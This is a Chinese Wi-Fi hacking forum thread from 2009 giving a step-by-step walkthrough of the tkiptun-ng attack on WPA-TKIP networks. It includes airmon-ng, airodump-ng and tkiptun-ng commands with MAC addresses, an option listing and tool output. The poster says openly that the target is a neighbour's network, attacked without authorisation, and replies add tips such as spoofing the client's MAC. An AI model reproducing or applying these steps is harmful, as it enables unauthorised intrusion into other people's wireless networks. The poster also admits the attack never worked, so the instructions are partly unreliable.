ji8635382 发表于 2009-2-27 07:55

tkiptun-ng攻击方法(我已经更新了请看下面)

本帖最后由 ji8635382 于 2009-3-3 17:59 编辑

ErikTews将在东京的PacSec大会上,演示他是如何在15分钟内破解WPA加密技术的。之前的无线加密技术WEP只需使用当今的笔记本即可在几分钟内破解。EricTews将演示他是如何破解WPA加密技术来读取从路由器传往笔记本的数据。为了读取正在传送的数据,Tews找到了无需用字典攻击法,来破解临时密钥完整性协议(TKIP)的方法。
下面就是进行破解的步骤 我参考国外的论坛写的!
首先要具备3点必备的攻击条件
1 客户端和接入点必须使用WPA TKIP 而且客户端必须连接
2 客户端和接入点必须使用的网络协议地址的IPv4
3一个长期存在的时间延长键(重新输入间隔)必须设定的接入点。在大多数调制解调器/无线路由器使用TKIP ,这一时期是默认情况下设置为3600秒,从而使攻击
以上3点基本上是没有问题了下面是就是攻击了
airmon-ng a 首先把网卡监视模式打开:输入airmon-ng start wlan0 注意我的网卡端口是wlan0不同的网卡端口都不一样可以用ifconfig -a 进行查看
输入后出现的内如如下
PID   Name
2954    dhcpcd


Interface       Chipset         Driver

wlan0         RTL8187         r8187 (monitor mode enabled)
不需要另外安装tkiptun-ng bt3正式版有自带的
2楼有最新的aircrack工具里面有带tkiptun-ng工具
介绍下tkiptun-ng工具

Filter options:过滤器的!

      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -D      : disable AP detection

Replay options:攻击的!

      -x nbpps: number of packets per second
      -a bssid: set Access Point MAC address
      -c dmac   : set DestinationMAC address
      -h smac   : set Source       MAC address
      -F      : choose first matching packet
      -e essid: set target AP SSID

Debug options:调试的!
      -K prga   : keystream for continuation
      -y file   : keystream-file for continuation
      -j      : inject FromDS packets
      -P pmk    : pmk for verification/vuln testing
      -p psk    : psk to calculate pmk with essid

source options:这个不太清楚 。:)呵呵

      -i iface: capture packets from this interface
      -r file   : extract packets from this pcap file

      --help            : Displays this usage screen

这个使用 airodump-ng -w 1 wlan0 这个就不解释了

我看下图1有一个essid为linksys的ap底下也有正常的客服端 这个我在上面注意已经强调了必需要有。
然后我们在打开一个 shell 下面开始tkiptun-ng的命令
tkiptun-ng wlan0 -a 00:0C:41:D3:12:81 -h 00:12:F0:6F:ED:38 wlan0 是我的端口 -a 是我们要工具的ap mac地址 使用airodump-ng工具时可以看到 -h 是我们自己的 mac地址用 ifconfig -a 可以查到 记入监视模式要忽略掉后面的0 接着我们可以看到图2的内容我们可以看到图上写着 注入成功 等待信号 拿到握手包 等等的内容
最后就等待ARP协议数据包的收集了

以上就是攻击的方式了


呵呵我也不知道出了问题还是我遗漏了什么或者可能是我的配置是问题,tkiptun-ng攻击一直在等待数据包气死我了 但是看老外也有成功注入的人希望你们也可以成功    tkiptun-ng还是测试版 我想正式版出来应该可以解决很多问题的! 希望大家对tkiptun-ng能多点关注 wpa的破解是有明天的 哈哈哈哈哈哈哈!!!!!!!!





















:victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory:

底下是新写的哦! 本教程只作参考任何法律责任我一概不负责。

2楼有最新的aircrack工具里面有带tkiptun-ng工具

忙了一上午回家 还是习惯把bt3打开看看回顾上次做的东西 突然有想到了tkiptun-ng因为用airolib-ng做hash表实在耗时间还有就是我邻居他设的wpa2密码实在厉害我已经给他搞的心力交瘁了,可是我有不想放弃比较我在这密码上耗的时间太多了。好了进入正题

打开shell输入airodump-ng -w vicino ath1 这个不解释了看不懂我也没有办法。
监视你要破解的wpa-TKIP密码类型的ap记住必需要有客服端的
关于底下那朋友说的需要更改mac 其实是不需要的 你输入底下的命令后软件自动更改mac
1 tkiptun-ng -h 00:12:F0:6F:ED:38 -a 00:0C:41:D3:12:81-m 80 -n 100 ath1 我用atheros网卡了所以显示ath1监视端口和上面的不一样,因为这次不是用我的华硕本本 今天用hp的!呵呵! -m 是最小数据包长度 -n 是最大数据包长度 我 80 和100比较稳定其他都效果不佳 这个是真对我ath网卡的其他的自己试试。 -h 写客服端的mac
!输入命令后出后会出现下面结果 图我没有办法给你们看了因为那太电脑还在破解中我是用另外的电脑写的希望你们理解!
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E    如果一直停留在 等待ARP协议数据包 就重新开始因为一直等就没有用的!
14:48:00Michael Test: Successful(这个意思是测试成功)   看清楚上面的 blub 1 2 3这个是固定的显示一定要和我写的一样才可以成功      这个工具的握手包没法靠攻击得到大家请慢慢的等 自己用aireplay工具的是无用的我已经式过了。
14:48:00Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 1
14:48:00Found specified AP
14:48:00Sending 4 directed DeAuth. STMAC: [ 2| 4 ACKs]
14:48:02WPA handshake: 00:0C:41:D3:12:81 captured
14:48:02Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-1109-144822.cap
14:48:22Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-1109-144822.cap
14:48:22Got the answer!
14:48:22Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.

Sent80 packets, current guess: 37..看到了吗?和上面的不一样哦!呵呵 现在开始猜密码了,你们有没有注意它写什么发包猜测 也就是说这软件是攻击ap在获取wpa的密码信息 这那我想到破解wep了!呵呵 现在猜了37次了 密码还没出现看来我邻居的密码真的很复杂啊!

hirte成员还没有公布正式的方法这些都是乱搞的!在东京大会上是15钟破解而我现在都用了1个小时还没有密码 现在只能等待正式版
    我现在电脑已经猜了58次 还没有出现密码   大家保佑我,如果出现密码会和大家说的 还有一个要注意客服端必需一直在线不然就无法用它攻击了。哎!!~~~~

zwmfyy 发表于 2009-2-27 08:21

http://www.aircrack-ng.orG,这个站被屏蔽了.要用代理才能上了.

ji8635382 发表于 2009-2-27 08:36

本帖最后由 ji8635382 于 2009-3-5 08:56 编辑

我已经做成lzm文件了放进 bt3\modules里面就可以了



23楼的 要等待2个相同的握手包才可以! 我弄了4个握手包才可以继续。 其实可以用别的电脑攻击对方客服端!我就是这样做的 一台电脑进行攻击,另一台电脑收集ARP数据包。 我的密码没有破解出来 软件猜测190后 回复无法发送数据表。哎~~~
还是等待正式版的吧! 听说也快了。 具体时间无从得知。

galaxysky 发表于 2009-2-27 10:19

期待中........

zhouwenliang 发表于 2009-2-27 10:50

好啊!!!!!!!!

lxl2008 发表于 2009-2-27 12:21

:)好啊!!!!!!!!

daibi 发表于 2009-2-27 13:19

========================================================
General Requirements
Both the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.

The AP must be configured for WPA plus TKIP.

A fairly long rekeying time must be in use such as 3600 seconds. It should be at least 20 minutes.

Specific Requirements
The network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.
==================================================

以上是官方网站上的最新解释,楼主似乎没有将自己的网卡MAC Fake 成和合法客户的一样

yorkz 发表于 2009-2-27 15:05

有点实际的了

piper 发表于 2009-2-27 17:04

大家给个能上这个网站的代理吧,thanks

ji8635382 发表于 2009-2-28 21:10

本帖最后由 ji8635382 于 2009-2-28 21:29 编辑

========================================================
General Requirements
Both the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.

The AP must be...
daibi 发表于 2009-2-27 13:19 http://www.anywlan.com/images/common/back.gif

Specific Requirements

network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking
关于这个特殊要求我还真的没有看到,因为官方保密了许多内容 如破解过程等等都保密了。 楼上的谢谢你了 我现在试试看! 不要字典 不要字典~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~祈祷!!

chang139 发表于 2009-2-28 21:17

这东西不顶对不住楼主,严重关注中

sbbi 发表于 2009-2-28 22:21

快了,快了,快了
页: [1] 2 3 4 5 6 7 8
查看完整版本: tkiptun-ng攻击方法(我已经更新了请看下面)